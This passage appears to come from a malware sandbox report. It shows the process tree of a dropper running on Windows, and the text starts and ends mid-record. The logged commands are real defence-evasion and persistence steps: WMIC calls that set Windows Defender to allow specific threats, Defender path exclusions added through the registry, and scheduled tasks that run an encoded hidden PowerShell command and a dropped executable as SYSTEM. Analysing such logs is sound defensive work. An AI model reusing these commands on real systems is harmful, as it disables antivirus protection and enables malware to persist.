forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
4⤵
PID:1796

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
PID:1140

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:1672

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
PID:1244

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
4⤵
PID:1252

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
PID:748

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:1496

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
PID:976

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
4⤵
PID:1524

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
PID:836

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:1960

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
PID:828

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1548

C:\Windows\system32\taskeng.exe
taskeng.exe {C87CD66E-ACB8-4916-A0CF-E456E0E30275} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:1644

C:\Users\Admin\AppData\Local\Temp\GGBXTQIHvxONXPngM\JPAWcIpLIGBPzJZ\VgXfIDg.exe
C:\Users\Admin\AppData\Local\Temp\GGBXTQIHvxONXPngM\JPAWcIpLIGBPzJZ\VgXfIDg.exe OV /site_id 767 /S
2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:832

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" &
3⤵
PID:1612

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
4⤵
PID:772

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
PID:528

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2020

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
PID:1696

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
4⤵
PID:1956

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
PID:948

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:1684

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
PID:976

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
4⤵
PID:1884

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
PID:1272

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:1864

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
PID:1672

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gHHUmLZaU" /SC once /ST 02:33:53 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
3⤵
- Creates scheduled task(s)
PID:1532

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gHHUmLZaU"
3⤵
PID:1492

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gHHUmLZaU"
3⤵
PID:1376

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ONbcuvmDOvHMWTXn" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1268

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ONbcuvmDOvHMWTXn" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1008

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ONbcuvmDOvHMWTXn" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1036

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ONbcuvmDOvHMWTXn" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1152

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ONbcuvmDOvHMWTXn" /t REG_DWORD /d 0 /reg:32
3⤵
PID:572

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ONbcuvmDOvHMWTXn" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1824

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ONbcuvmDOvHMWTXn" /t REG_DWORD /d 0 /reg:64
3⤵
PID:924

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ONbcuvmDOvHMWTXn" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1884

C:\Windows\SysWOW64\cmd.exe
cmd /C copy nul "C:\Windows\Temp\ONbcuvmDOvHMWTXn\IvaiUsPI\KvgbzqwhFNVHnTGL.wsf"
3⤵
PID:1612

C:\Windows\SysWOW64\wscript.exe
wscript "C:\Windows\Temp\ONbcuvmDOvHMWTXn\IvaiUsPI\KvgbzqwhFNVHnTGL.wsf"
3⤵
- Modifies data under HKEY_USERS
PID:1284

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VnDWhryCSIE" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1740

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VnDWhryCSIE" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1836

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XpqoUDXlJoUn" /t REG_DWORD /d 0 /reg:64
4⤵
PID:948

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XpqoUDXlJoUn" /t REG_DWORD /d 0 /reg:32
4⤵
PID:836

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kuGFoFUJyZFbBZdRkpR" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1348

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kuGFoFUJyZFbBZdRkpR" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1496

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mrDIPifxyaTU2" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1492

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mrDIPifxyaTU2" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1080

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\piLDiRqvGTKTC" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1512

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\piLDiRqvGTKTC" /t REG_DWORD /d 0 /reg:64
4⤵
PID:748

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qDCCGhOyU" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1964

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qDCCGhOyU" /t REG_DWORD /d 0 /reg:64
4⤵
PID:924

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\xoWQddOigjsPCTVB" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2016

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\xoWQddOigjsPCTVB" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1132

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\LocalLow\zVCERlXqEUubX" /t REG_DWORD /d 0 /reg:32
4⤵
PID:300

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\LocalLow\zVCERlXqEUubX" /t REG_DWORD /d 0 /reg:64
4⤵
PID:744

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\GGBXTQIHvxONXPngM" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1260

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\GGBXTQIHvxONXPngM" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1548

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ONbcuvmDOvHMWTXn" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1944

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VnDWhryCSIE" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1376

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ONbcuvmDOvHMWTXn" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1348

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VnDWhryCSIE" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1580

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XpqoUDXlJoUn" /t REG_DWORD /d 0 /reg:32
4⤵
PID:680

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XpqoUDXlJoUn" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1036

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kuGFoFUJyZFbBZdRkpR" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1864

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kuGFoFUJyZFbBZdRkpR" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1964

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mrDIPifxyaTU2" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1372

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mrDIPifxyaTU2" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2044

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\piLDiRqvGTKTC" /t REG_DWORD /d 0 /reg:32
4⤵
PID:956

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\piLDiRqvGTKTC" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1684

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qDCCGhOyU" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1344

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qDCCGhOyU" /t REG_DWORD /d 0 /reg:64
4⤵
PID:456

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\xoWQddOigjsPCTVB" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1648

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\xoWQddOigjsPCTVB" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1092

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\LocalLow\zVCERlXqEUubX" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1572

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\LocalLow\zVCERlXqEUubX" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1244

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\GGBXTQIHvxONXPngM" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1700

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\GGBXTQIHvxONXPngM" /t REG_DWORD /d 0 /reg:64
4⤵
PID:936

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ONbcuvmDOvHMWTXn" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1036

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ONbcuvmDOvHMWTXn" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1768

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "lJLWniCkwZbjhapzm" /SC once /ST 05:59:25 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ONbcuvmDOvHMWTXn\cMoyCgwrTdLTZce\sOUUgCQ.exe\" 7V /site_id 767 /S" /V1 /F
3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1964

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "lJLWniCkwZbjhapzm"
3⤵
PID:1740

C:\Windows\Temp\ONbcuvmDOvHMWTXn\cMoyCgwrTdLTZce\sOUUgCQ.exe
C:\Windows\Temp\ONbcuvmDOvHMWTXn\cMoyCgwrTdLTZce\sOUUgCQ.exe 7V /site_id 767 /S
2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies Internet Explorer settings
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:528

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" &
3⤵
PID:1568

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
4⤵
PID:608

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
PID:1356

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:1260

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
PID:1532

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
4⤵
PID:880

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
PID:1492

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:1600

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
PID:1968

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
4⤵
PID:1824

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
PID:1444

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:680

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
PID:928

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bkckNrBYOjfprwtEPo"
3⤵
PID:768

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
3⤵
PID:1696

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
4⤵
PID:924

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
3⤵
PID:1384

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
4⤵
PID:1976

C:\Windows\SysWOW64\schtasks.exe
